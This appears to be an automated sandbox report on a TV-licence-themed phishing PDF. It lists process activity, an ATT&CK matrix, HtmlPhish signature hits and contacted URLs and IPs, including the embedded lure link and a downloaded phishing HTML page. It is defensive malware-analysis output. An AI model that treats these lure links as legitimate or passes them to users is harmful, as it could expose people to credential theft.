              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1944,i,4660417916530889188,3192819211020463480,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: YOUR TV LICENCE STATEMENT.pdfInitial sample: PDF keyword /JS count = 0
              Source: YOUR TV LICENCE STATEMENT.pdfInitial sample: PDF keyword /JavaScript count = 0
              Source: YOUR TV LICENCE STATEMENT.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Spearphishing Link
              Windows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential Dumping1
              System Information Discovery
              Remote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585745 Sample: YOUR TV LICENCE STATEMENT.pdf Startdate: 08/01/2025 Architecture: WINDOWS Score: 72 37 x1.i.lencr.org 2->37 47 Yara detected HtmlPhish44 2->47 49 Yara detected HtmlPhish10 2->49 51 Yara detected HtmlPhish7 2->51 53 2 other signatures 2->53 8 chrome.exe 13 2->8         started        12 chrome.exe 2->12         started        14 Acrobat.exe 18 75 2->14         started        signatures3 process4 dnsIp5 39 192.168.2.4, 138, 443, 49723 unknown unknown 8->39 41 192.168.2.5 unknown unknown 8->41 43 239.255.255.250 unknown Reserved 8->43 25 Unpaid TV License ...opy.html.crdownload, HTML 8->25 dropped 16 chrome.exe 8->16         started        45 192.168.2.16 unknown unknown 12->45 19 chrome.exe 12->19         started        21 AcroCEF.exe 106 14->21         started        file6 process7 dnsIp8 27 freepnglogos.com 78.46.22.25, 443, 49762, 49763 HETZNER-ASDE Germany 16->27 29 www.google.com 142.250.74.196, 443, 49774, 50022 GOOGLEUS United States 16->29 35 10 other IPs or domains 16->35 31 142.250.184.228, 443, 50067, 50077 GOOGLEUS United States 19->31 33 www.freepnglogos.com 19->33 23 AcroCEF.exe 2 21->23         started        process9

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              YOUR TV LICENCE STATEMENT.pdf5%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source.jpeg0%Avira URL Cloudsafe
              https://www.rheinwerk-verlag.de/affinity-publisher-das-umfassende-handbuch/0%Avira URL Cloudsafe
              https://publishing.blog/eu-ai-act-was-sie-wissen-muessen/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-400x200.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/12/maxresdefault.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1536x878.jpeg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Future-300x200.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-json/app/v1/pwp-manifest0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-768x439.jpeg0%Avira URL Cloudsafe
              https://publishing.blog/spenden/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-768x512.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU.png0%Avira URL Cloudsafe
              https://publishing.blog/#breadcrumb0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/03/8968_900x450.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/restart-phone-768x512.webp0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-768x384.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/restart-phone-1024x683.webp0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/restart-phone.webp0%Avira URL Cloudsafe
              https://publishingblog.ch/wp-content/uploads/2015/03/Bildschirmfoto-2015-03-18-um-16.58.00.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-270x270.png0%Avira URL Cloudsafe
              https://publishing.blog/#/schema/logo/image/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Future.jpg0%Avira URL Cloudsafe
              https://publishing.blog/#organization0%Avira URL Cloudsafe
              https://publishing.blog/allen-institute-ai-olmo-open-language-models/0%Avira URL Cloudsafe
              https://publishing.blog/0%Avira URL Cloudsafe
              https://publishing.blog/#website0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-768x432.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-1024x683.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-200x113.jpg0%Avira URL Cloudsafe
              https://app.friendlyanalytics.ch/js/container_yPXA3OKo.js0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-500x250.png0%Avira URL Cloudsafe
              https://pressdify.com/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-300x171.jpeg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-500x250.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-192x192.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-300x150.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-200x133.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-200x114.jpeg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-230x115.png0%Avira URL Cloudsafe
              https://publishing.blog/sponsored-posts/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-900x450.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/restart-phone-300x200.webp0%Avira URL Cloudsafe
              https://publishing.blog/ki-revolution-chancen-herausforderungen/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-690x345.png0%Avira URL Cloudsafe
              file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.html0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-200x100.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-768x384.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365.png0%Avira URL Cloudsafe
              https://publishing.blog/page/2/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-300x200.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-620x310.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Future-768x512.jpg0%Avira URL Cloudsafe
              https://publishing.blog0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-768x384.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-200x100.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-32x32.png0%Avira URL Cloudsafe
              https://help.lafayette.edu/wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/06/pressdify-launch-banner-500-0%Avira URL Cloudsafe
              https://publishing.blog/camera-raw-acr-und-xmp-dateien-erklaert/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-1024x576.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/plugins/ml-slider/assets/sliders/nivoslider/jquery.nivo.slider.pa0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1024x585.jpeg0%Avira URL Cloudsafe
              https://publishing.blog/?s=0%Avira URL Cloudsafe
              https://publishing.blog/impressum/0%Avira URL Cloudsafe
              https://publishing.blog/iphone-sicherheitsfeature-neustart-inaktivitaet/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-1024x512.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-180x180.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-499x250.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-499x250.png0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Future-1024x683.jpg0%Avira URL Cloudsafe
              https://publishing.blog/tag/photoshop/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-300x169.jpg0%Avira URL Cloudsafe
              https://publishing.blog/serie/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/restart-phone-200x133.webp0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2022/08/publishingblog.png0%Avira URL Cloudsafe
              http://morntag.com0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024.png0%Avira URL Cloudsafe
              https://publishing.blog/tag/camera-raw/0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2024/11/KI-Future-200x133.jpg0%Avira URL Cloudsafe
              https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-240x120.png0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                publishingblog.ch
                35.207.98.7
                truefalse
                  unknown
                  maxcdn.bootstrapcdn.com
                  104.18.10.207
                  truefalse
                    high
                    freepnglogos.com
                    78.46.22.25
                    truefalse
                      high
                      www.google.com
                      142.250.74.196
                      truefalse
                        high
                        ucarecdn.com
                        151.101.2.132
                        truefalse
                          high
                          d37ofkz6jzc5jh.cloudfront.net
                          65.9.66.17
                          truefalse
                            unknown
                            publishing.blog
                            35.207.98.7
                            truefalse
                              unknown
                              x1.i.lencr.org
                              unknown
                              unknownfalse
                                high
                                help.lafayette.edu
                                unknown
                                unknownfalse
                                  unknown
                                  www.freepnglogos.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://www.freepnglogos.com/uploads/red-email-mail-logo-png-8.pngfalse
                                      high
                                      https://publishingblog.ch/wp-content/uploads/2015/03/Bildschirmfoto-2015-03-18-um-16.58.00.pngfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.jsfalse
                                        high
                                        https://publishing.blog/false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.freepnglogos.com/uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.pngfalse
                                          high
                                          https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.jsfalse
                                            high
                                            file:///C:/Users/user/Downloads/Unpaid%20TV%20License%20Statement-%20Copy.htmlfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://help.lafayette.edu/wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.pngfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/false
                                              high
                                              https://www.freepnglogos.com/uploads/microsoft-office-png-logo/microsoft-office-2013-symbol-logo-png-6.pngfalse
                                                high
                                                https://www.freepnglogos.com/uploads/gmail-email-logo-png-12.pngfalse
                                                  high
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://publishing.blog/wp-json/app/v1/pwp-manifestchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/eu-ai-act-was-sie-wissen-muessen/chromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.rheinwerk-verlag.de/affinity-publisher-das-umfassende-handbuch/chromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/spenden/chromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-768x439.jpegchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source.jpegchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1536x878.jpegchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-400x200.pngchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2024/11/KI-Future-300x200.jpgchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://publishing.blog/wp-content/uploads/2024/12/maxresdefault.jpgchromecache_281.10.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://cookiedatabase.org/tcf/purposes/chromecache_281.10.drfalse
                                                    high
                                                    https://publishing.blog/#breadcrumbchromecache_281.10.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://publishing.blog/wp-content/uploads/2024/11/restart-phone-768x512.webpchromecache_281.10.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.linkedin.com/in/roschuchromecache_281.10.drfalse
                                                      high
                                                      https://github.com/twbs/bootstrap/graphs/contributors)chromecache_292.10.dr, chromecache_274.10.drfalse
                                                        high
                                                        https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-768x384.pngchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2024/11/restart-phone.webpchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-768x512.pngchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-270x270.pngchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2023/03/8968_900x450.jpgchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU.pngchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://publishing.blog/wp-content/uploads/2024/11/restart-phone-1024x683.webpchromecache_281.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://opensource.org/licenses/MIT).chromecache_275.10.dr, chromecache_289.10.drfalse
                                                          high
                                                          https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-1024x683.pngchromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-768x432.jpgchromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/#organizationchromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/allen-institute-ai-olmo-open-language-models/chromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/#/schema/logo/image/chromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/#websitechromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://publishing.blog/wp-content/uploads/2024/11/KI-Future.jpgchromecache_281.10.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://schema.orgchromecache_281.10.drfalse
                                                            high
                                                            https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-200x113.jpgchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://app.friendlyanalytics.ch/js/container_yPXA3OKo.jschromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://pressdify.com/chromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-300x150.pngchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-500x250.jpgchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-500x250.pngchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-200x133.pngchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-300x171.jpegchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-192x192.pngchromecache_281.10.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.linkedin.com/learning/firefly-grundkurs-24601911/bildmanipulation-und-bildgestaltung-mitchromecache_281.10.drfalse
                                                              high
                                                              https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-200x114.jpegchromecache_281.10.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.linkedin.com/learning/lehren-und-lernen-mit-office-365chromecache_281.10.drfalse
                                                                high
                                                                https://publishing.blog/sponsored-posts/chromecache_281.10.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://yoast.com/wordpress/plugins/seo/chromecache_281.10.drfalse
                                                                  high
                                                                  https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-230x115.pngchromecache_281.10.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-900x450.pngchromecache_281.10.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://publishing.blog/wp-content/uploads/2024/11/restart-phone-300x200.webpchromecache_281.10.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://publishing.blog/ki-revolution-chancen-herausforderungen/chromecache_281.10.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://gmpg.org/xfn/11chromecache_281.10.drfalse
                                                                    high
                                                                    https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-690x345.pngchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365.pngchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-768x384.jpgchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-200x100.jpgchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blog/wp-content/uploads/2024/11/KI-Verordnung-EU-300x200.pngchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blog/page/2/chromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://publishing.blogchromecache_281.10.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/)YOUR TV LICENCE STATEMENT.pdffalse
                                                                      high
                                                                      https://publishing.blog/wp-content/uploads/2024/11/KI-Future-768x512.jpgchromecache_281.10.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-620x310.pngchromecache_281.10.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                                                        high
                                                                        https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-768x384.pngchromecache_281.10.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024-200x100.pngchromecache_281.10.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://publishing.blog/wp-content/uploads/2023/06/pressdify-launch-banner-500-chromecache_281.10.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-32x32.pngchromecache_281.10.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://github.com/twbs/bootstrap/blob/main/LICENSE)chromecache_277.10.dr, chromecache_292.10.dr, chromecache_274.10.drfalse
                                                                          high
                                                                          https://publishing.blog/camera-raw-acr-und-xmp-dateien-erklaert/chromecache_281.10.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-1024x576.jpgchromecache_281.10.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://publishing.blog/wp-content/plugins/ml-slider/assets/sliders/nivoslider/jquery.nivo.slider.pachromecache_281.10.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://publishing.blog/wp-content/uploads/2024/11/AI2-Open-Source-1024x585.jpegchromecache_281.10.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://publishing.blog/impressum/chromecache_281.10.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://getbootstrap.com/)chromecache_277.10.dr, chromecache_292.10.dr, chromecache_274.10.drfalse
                                                                            high
                                                                            https://publishing.blog/iphone-sicherheitsfeature-neustart-inaktivitaet/chromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/?s=chromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-1024x512.pngchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2021/01/cropped-favicon-180x180.pngchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2023/03/8968_900x450-499x250.jpgchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2020/01/LinkedIn-Office-365-499x250.pngchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2024/11/KI-Future-1024x683.jpgchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/tag/photoshop/chromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2024/12/maxresdefault-300x169.jpgchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://morntag.comchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/serie/chromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2022/08/publishingblog.pngchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2024/11/restart-phone-200x133.webpchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/wp-content/uploads/2024/09/firefly-kurs-september-2024.pngchromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://publishing.blog/tag/camera-raw/chromecache_281.10.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
